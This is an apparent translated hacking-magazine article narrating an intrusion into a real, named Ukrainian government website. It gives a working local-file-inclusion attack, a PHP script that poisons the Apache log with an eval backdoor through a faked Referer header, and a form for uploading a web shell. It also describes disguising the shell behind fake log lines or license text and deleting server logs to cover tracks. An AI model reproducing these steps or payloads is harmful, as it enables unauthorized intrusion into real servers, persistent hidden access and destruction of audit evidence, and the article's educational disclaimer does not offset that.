Official Site Of The Xakep 4T english version

Lately, I see more and more vulnerable government web sites. And the reason is banal: government web sites are charged to be written by non-professionals, or the website is not being moderated and support team does not check emails, etc. Security audit is considered as some kind of luxury service when, in fact, it is a necessity as well as the key to success of website users.

The purpose of this hack is not getting some profit or benefit from the uploaded shell. I want to show how vulnerable the highest level web sites can be. It would seem that protecting them should be the #1 task, because it’s not difficult to imagine what entails hacking the government web site. What if I break into the LAN and get the access to the server which stores some secret information, such as external independent testing results (in case of MES web site)? What then? The authenticity of those certificates which are required by every institution of higher education can be called into question at the moment? Relax. I haven’t done that, but reported all found errors and bugs to the government web site support.

Picking out a victim

Dunno how it goes in your case, but as for me, it is easier to search for vulnerabilities while listening to some nice music. I’ve found the Disturbed - Perfect Insanity in my playlist and opened the mighty Google. Try to type in the "міністерство" and see neither more nor less than 15400000 results. Just open the first link and enter the web site of the Ministry of Education and Science of Ukraine.

The first thing that strikes the eye is the "Official web site, 2004" inscription, but all web site news are fresh at the time. "Long time no update" - I thought. Thinking of that, I put the mouse on the menu while browsing the status bar. All links were like http://site/dir. The mode_rewrite function could be turned on. After clicking the link I’ve found the following address in the bar: http://www.mon.gov.ua/main.php?query=zno. I also tried to find the path by changing the "query" parameter to "query []", but it was far from it and the bug was far to be discovered. Although, the web site layout had clearly gone bad. Either the error report output was just simply turned off, or there was no vulnerability down here. I just felt that vulnerability should definitely exist somewhere here, so I decided to check the RFI availability but got no results again.

Well, we can try to find the path to the root server as my scanner did not find the phpinfo. The first you need is to make sure that this is a real Local File Include and is it possible to cut the file extension using the null-byte. I just tried to include the vulnerable file:

http://www.mon.gov.ua/main.php?query=main.php%00

I got the page opened an infinite number of times, forming a pyramid as a result. This means that the vulnerability really exists, but we cannot say for sure whether it is remote or local include.

Here's another example of not only the LFI but the Looped DoS. Such query can just easily "drop" the web site. I had quickly stopped downloading the page and began substituting the symbols of "cd” command into the current query. The path was picked up at the third attempt. I think you understood how much "../" symbols the query should contain?

Forbbiden: analyzing the situation

It became really easy to upload a shell after someone smart enough got a point in using the /proc/self/environ! You just have to send a POST-request with a fake User-Agen and that’s it. So, now we’ll try:

http://www.mon.gov.ua/main.php?query=../../../proc/self/environ%00

Damn… got nothing. But there are apache logs! So, let’s try...

main.php?query=../../../proc/self/fd/2%00

And what happens?

[Sun Nov 15 07:41:42 2009] [error] [client 92.249.112.225] client denied by server configuration: /usr/share/phpMyAdmin/
[Sun Nov 15 08:43:31 2009] [error] [client 65.55.109.220] client denied by server configuration: /usr/share/phpMyAdmin/phpAdsNew, referer: http://xxxx.us/album/thumbnails.php?album=search&search=releases

The whole apache log is like that. You might think - "Hmm, it doesn’t quite look like an access”. And that’s correct, because here we have the "403 – Forbbiden” errors only. User-Agent is not written to this log, but the Referrer is. Nevertheless, it can be faked just as easy as User-Agent. The main thing is to find a page which would show us the cherished 403 error. By reviewing the log, it becomes clear that we deal with phpMyAdmin. Now, after checking that by opening the http://www.mon.gov.ua/phpMyAdmin we can get any server answer we need. Let’s write a simple PHP script for Referrer imitation:

<?php
$server = '212.111.193.189';
$dir = '/phpMyAdmin/';
$evilcode = '';

$header = "GET " .$dir. " HTTP/1.0\r\n";
$header .= "Host: " .$server. "\r\n";
$header .= "Referer: " .$evilcode. "\r\n";
$header .= "Connection: close\r\n\r\n";

$fp = fsockopen($server, 80);
if(!$fp) { die("[ X ] Connection failed");} else { echo "[ ~ ] Connection successful \r\n";}
if(fputs($fp,$header)) {echo "[ ~ ] Data sended! \r\n";} else { die("[ X ] Error While sending headers!"); }
$result = fgets($fp, 128);
if(strpos($result,'Forbidden')) echo "[ ~ ] Successful! \r\n"; else die("[ X ] Failed!");

?>

You can use some existing automated program (e.g. InetCrack, HttpREQ from [x26] VOLAND, or just dispense with some FireFox plug-in) if you're too lazy to write that script.

Uploading the shell

Once we have sent the request it must be inscribed in the log. Since we replaced the referrer, the log should be like:

[Xxx Xxx xx xx:xx:xx 2009] [error] [client xx.xx.xx.xx] client denied by server configuration: /usr/share/phpMyAdmin/ , referer: <?php eval($_REQUEST[ev]); ?>

Consequently, our code should be executed when loading the log through a vulnerable script. Let’s check it through the browser:

http://www.mon.gov.ua/main.php?query=../../../proc/self/fd/2%00&ev=ls+la

We did it, so we can see the directory list now. I was trying to upload the shell with such famous software as wget, get, links, lynx, but it always failed. Html-form shell uploading option realization attempt:

<form action="http://www.mon.gov.ua/main.php?query=../../../proc/self/fd/2%00&ev=copy($_FILES[file][tmp_name], $_GET[aa]);&aa=./mon.php" method="post" enctype="multipart/form-data">
<input type="file" name="file"><br>
<input type="submit" value="Загрузить"><br>
</form>

Now I just simply upload the shell from my computer, enter the web shell page and enter the password (do not forget to set unique passwords for your shells). After reviewing the files list I saw 2 empty files named like "error.php” and "error”. That’s a wonderful opportunity to hide our shell. I take the same errors log and insert it into the file beginning. Now it approximately looks like this:

<?php/*
[Mon Nov 16 11:14:07 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:08 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:14 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:15 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
[Mon Nov 16 11:14:18 2009] [error] [client ::1] client denied by server configuration: /usr/share/phpMyAdmin/
...
* / Many carriage returns?>
<?PHP
//Authentication
$login = ""; //Login
$pass = ""; //Pass
... ?>

I think I don’t need to explain that the line from the log file should be repeated for many times. This method is frequently used, so take a note when you’ll be searching for some shell. The file beginning can also be embedded with the text of web site CMS copyrights or licenses. Usually, after admin sees the GNU license he closes the file with no hesitation and that’s exactly what we need.

Don’t forget to remove log files. Thank God I had all appropriate rights for that and I did the "rm-rf/var/log/httpd/".

Conclusion

Web site hacking is restricted and punishable by law, so I’d recommend you not to do that. Be "white" and smart if you still have decided to hack some web site and inform the web site administrator about those vulnerabilities you had found in one’s system (as I did right away).

WARNING

Warning! The information is presented strictly in the interest of education! Neither the author nor editors are not responsible for any actions you might undertake!